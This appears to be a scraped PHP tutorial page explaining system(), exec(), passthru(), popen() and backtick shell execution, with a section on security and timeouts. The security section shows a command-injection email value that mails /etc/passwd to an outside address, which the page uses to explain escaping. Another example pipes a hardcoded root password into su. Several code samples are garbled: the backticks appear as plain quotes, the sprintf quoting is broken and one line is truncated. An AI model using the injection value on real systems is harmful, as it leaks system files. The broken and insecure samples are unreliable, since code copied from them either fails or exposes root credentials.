Home  >  Article  >  Backend Development  >  Detailed explanation of the usage of php function system|exec|passthru

Detailed explanation of the usage of php function system|exec|passthru

WBOY
WBOYOriginal
2016-07-25 08:53:381333browse
  1. system("/usr/local/bin/webalizer/webalizer");
Copy code

exec() Prototype: string exec (string command [, string array [, int return_var]]) The exec () function is similar to system (), and also executes the given command, but does not output the result, but returns the last line of the result. Although it only returns the last line of the command result, using the second parameter array can get the complete result by appending the results line by line to the end of the array. So if the array is not empty, it is best to use unset() to clear it before calling it. Only when the second parameter is specified, the third parameter can be used to obtain the status code of command execution. example:

  1. exec("/bin/ls -l");
  2. exec("/bin/ls -l", $res);
  3. exec("/bin/ls -l", $res, $ rc);
Copy code

passthru() Prototype: void passthru (string command [, int return_var]) passthru () only calls the command and does not return any results, but outputs the running results of the command directly to the standard output device as is. Therefore, the passthru() function is often used to call programs like pbmplus (a tool for processing images under Unix that outputs a binary stream of original images). It can also get the status code of command execution. example:

  1. header("content-type: image/gif");
  2. passthru("./ppmtogif hunte.ppm");
Copy code

2) Open the process with the popen() function The above method can only simply execute the command, but cannot interact with the command. But sometimes you must enter something into the command. For example, when adding a Linux system user, you need to call su to change the current user to root, and the su command must enter the root password on the command line. In this case, it is obviously not possible to use the method mentioned above. The popen() function opens a process pipe to execute the given command and returns a file handle. Since a file handle is returned, you can read and write to it. In php3, this kind of handle can only be operated in a single mode, either writing or reading; starting from php4, it can be read and written at the same time. Unless the handle is opened in one mode (read or write), the pclose() function must be called to close it. Example 1:

  1. $fp=popen("/bin/ls -l", "r");
Copy code

Example 2

  1. /* How to add a system user in php
  2. The following is a routine to add a user named james,
  3. The root password is verygood. For reference only
  4. */
  5. $sucommand = "su --login root --command";
  6. $useradd = "useradd ";
  7. $rootpasswd = "verygood";
  8. $user = "james";
  9. $user_add = sprintf ("%s "%s %s"",$sucommand,$useradd,$user);
  10. $fp = @popen($user_add,"w");
  11. @fputs($fp,$rootpasswd);
  12. @ pclose($fp);
  13. ?>
Copy code

3) Use a backtick (`, that is, the one under the esc key on the keyboard, which is the same as ~) This method has not been included in the PHP documentation before and exists as a secret technique. The method is very simple. Use two backticks to enclose the command to be executed as an expression. The value of this expression is the result of the command execution. For example:

  1. $res='/bin/ls -l';
  2. echo '
  3. '.$res.'
  4. ';
Copy the code

The output of this script: hunte.gif hunte.ppm jpg.htm jpg.jpg passthru.php What to consider? There are two issues to consider: security and timeouts. Let’s look at safety first. For example, you have a small online store, so the list of products available for sale is placed in a file. You write an html file with a form that lets your users enter their email address and then sends them a list of products. Assuming that you have not used PHP's mail() function (or have never heard of it), you call the mail program of the Linux/Unix system to send this file. The program looks like this: system("mail $to

Using this code will not cause any danger to ordinary users, but in fact there is a very large security vulnerability. If a malicious user enters an email address like this:

  1. '--bla ; mail someone@domain.com < /etc/passwd ;'
Copy code

Then this command eventually becomes:

  1. 'mail --bla ; mail someone@domain.com < /etc/passwd ; < products.txt'
Copy code

No matter which network administrator sees such a command, Will break out in a cold sweat.

php provides two functions: escapeshellcmd() and escapeshellarg(). The function escapeshellcmd escapes all characters in a string that may be used to execute another command without the shell. These characters have special meanings in the shell, such as semicolon (), redirection (>), and reading from file (<). The function escapeshellarg is used to process command parameters. It adds single quotes around the given string and escapes the single quotes in the string so that the string can be safely used as a command argument. <)等。函数escapeshellarg是用来处理命令的参数的。 它在给定的字符串两边加上单引号,并把字符串中的单引号转义,这样这个字符串 就可以安全地作为命令的参数。

Timeout issue. If the command to be executed takes a long time, the command should be run in the background of the system. But by default, functions such as system() will not return until the command is finished running (actually, they have to wait for the output of the command), which will definitely cause the PHP script to time out.

Solution: Redirect the output of a command to another file or stream. For example:

  1. system("/usr/local/bin/order_proc > /tmp/null &");
Copy code


Statement:
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn